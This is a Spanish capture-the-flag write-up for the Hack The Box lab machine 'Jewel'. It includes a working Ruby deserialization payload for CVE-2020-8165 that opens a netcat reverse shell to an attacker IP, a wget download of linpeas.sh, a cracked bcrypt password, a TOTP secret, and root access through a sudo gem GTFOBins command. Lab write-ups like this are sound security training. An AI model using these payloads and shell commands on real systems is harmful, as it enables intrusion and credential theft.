# Jewel

**OS**: Linux \
**Dificultad**: Medio \
**Puntos**: 30

## Resumen
- Audit Gemfile.lock
- CVE-2020-8165 (Ruby on Rails)
- LinPEAS
- John The Ripper
- Google Authenticator code
- GTFOBins Gem

## Nmap Scan

`nmap -Pn -sV -sC -p- -oN jewel.txt 10.10.10.211`

```
Nmap scan report for 10.10.10.211
Host is up (0.071s latency).
Not shown: 65532 filtered ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 fd:80:8b:0c:73:93:d6:30:dc:ec:83:55:7c:9f:5d:12 (RSA)
|   256 61:99:05:76:54:07:92:ef:ee:34:cf:b7:3e:8a:05:c6 (ECDSA)
|_  256 7c:6d:39:ca:e7:e8:9c:53:65:f7:e2:7e:c7:17:2d:c3 (ED25519)
8000/tcp open  http    Apache httpd 2.4.38
|_http-generator: gitweb/2.20.1 git/2.20.1
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.38 (Debian)
| http-title: 10.10.10.211 Git
|_Requested resource was http://10.10.10.211:8000/gitweb/
8080/tcp open  http    nginx 1.14.2 (Phusion Passenger 6.0.6)
|_http-server-header: nginx/1.14.2 + Phusion Passenger 6.0.6
|_http-title: BL0G!
Service Info: Host: jewel.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

## Enumeración

En el puerto 8080 se encuentra un sistema de registro de usuarios e inicio de sesión.

![1](img/1.png)

En el puerto 8000 podemos ver el repositorio de la aplicación anterior.

![2](img/2.png)

Después de revisar los archivos de la aplicación encontramos que está hecha con ruby y podemos ver el archivo **Gemfile.lock** que contiene todas las dependencias que usa la página web.

![3](img/3.png)

Utilizando la siguiente [página web](https://audit.fastruby.io/) podemos verificar la seguridad que tienen los módulos que se están usando solo subiendo el archivo **Gemfile.lock** y la vulnerabilidad más interesante es la siguiente:

![4](img/4.png)

### CVE-2020-8165 (Ruby on Rails)

Investigando el tema más a fondo llegamos al siguiente [articulo](https://www.elttam.com/blog/ruby-deserialization/) que nos explica como tomar ventaja de la vulnerabilidad al igual que el siguiente [repositorio](https://github.com/masahiro331/CVE-2020-8165).

Utilizando los recursos anteriores podemos crear nuestro script para generar el payload y obtener una reverse shell.

##### rce.rb
```ruby
require 'erb'
require 'uri'
require "active_support"

code = '`/usr/bin/nc.traditional 10.10.14.201 1234 -e /bin/sh`'

erb = ERB.allocate
erb.instance_variable_set :@src, code
erb.instance_variable_set :@filename, "1"
erb.instance_variable_set :@lineno, 1

payload = Marshal.dump(ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new erb, :result)

puts URI.encode_www_form(payload: payload)
```

Creamos un nuevo usuario he iniciamos sesión, una vez que iniciamos sesión nos vamos al apartado de **profile** y **edit user**.

> Es recomendable usar Chromium o Google chrome, ya que en Firefox puede llegar a tirar errores al crear el usuario.

![5](img/5.png)

Generamos nuestro payload.

`ruby rce.rb`

![6](img/6.png)

Ponemos a la escucha nuestro netcat.

`rlwrap nc -lvnp 1234`

Capturamos la request al momento de darle clic en update user y modificamos el valor de **user%5Busername%5D** con el contenido de nuestro payload.

![7](img/7.png)

Posteriormente hacemos una petición a **/articles** para ejecutar nuestro exploit.

![8](img/8.png)

Obtenemos nuestra reverse shell.

- `export TERM=xterm-color`
- `python3 -c "import pty;pty.spawn('/bin/bash')"`

![9](img/9.png)

## Escalada de Privilegios

Utilizando **linpeas.sh** para enumerar nos encontramos con un par de hashes.

- `sudo python3 -m http.server 80`
- `wget http://10.10.14.201/linpeas.sh`
- `chmod +x linpeas.sh`
- `./linpeas.sh`

![10](img/10.png)

Leyendo el archivo **/var/backups/dump_2020-08-27.sql** podemos ver el hash de **bill** que es diferente al que se encuentra en **/home/bill/blog/bd.sql**.

- `cat /var/backups/dump_2020-08-27.sql | grep bill`
- `cat /home/bill/blog/bd.sql | grep bill`

![11](img/11.png)

Utilizando john podemos descifrar el siguiente hash **$2a$12$QqfetsTSBVxMXpnTR.JfUeJXcJRHv5D5HImL0EHI7OzVomCrqlRxW**.

`sudo john hash.txt -wordlist=/usr/share/wordlists/rockyou.txt`

![12](img/12.png)

Al utilizar el password con el comando **sudo -l** nos pide un código de verificación y existe un archivo que contiene una especie de secreto.

- `cat .google_authenticator`
- `sudo -l`

![13](img/13.png)

```
bill: spongebob
Secret: 2UQI3R52WFCLE6JTLDCSJYMJH4
```

### Google Authenticator code

Investigando podemos utilizar esa cadena para generar nuestros códigos de verificación haciendo uso de un plugin de Firefox llamado [Authenticator](https://addons.mozilla.org/en-US/firefox/addon/auth-helper/).

Una vez creado nuestro código podemos repetir el proceso y veremos que es posible ejecutar **/usr/bin/gem** como sudo.

![14](img/14.png)

### GTFOBins Gem

En la página de [GTFOBins](https://gtfobins.github.io/gtfobins/gem/) nos explica la forma de tomar ventaja de este comando que podemos ejecutar como sudo.

`sudo gem open -e "/bin/sh -c /bin/sh" rdoc`

![15](img/15.png)

## Referencias
https://audit.fastruby.io/ \
https://www.elttam.com/blog/ruby-deserialization/ \
https://github.com/masahiro331/CVE-2020-8165 \
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS \
https://www.openwall.com/john/ \
https://github.com/google/google-authenticator/wiki/Key-Uri-Format \
https://addons.mozilla.org/en-US/firefox/addon/auth-helper/ \
https://gtfobins.github.io/gtfobins/gem/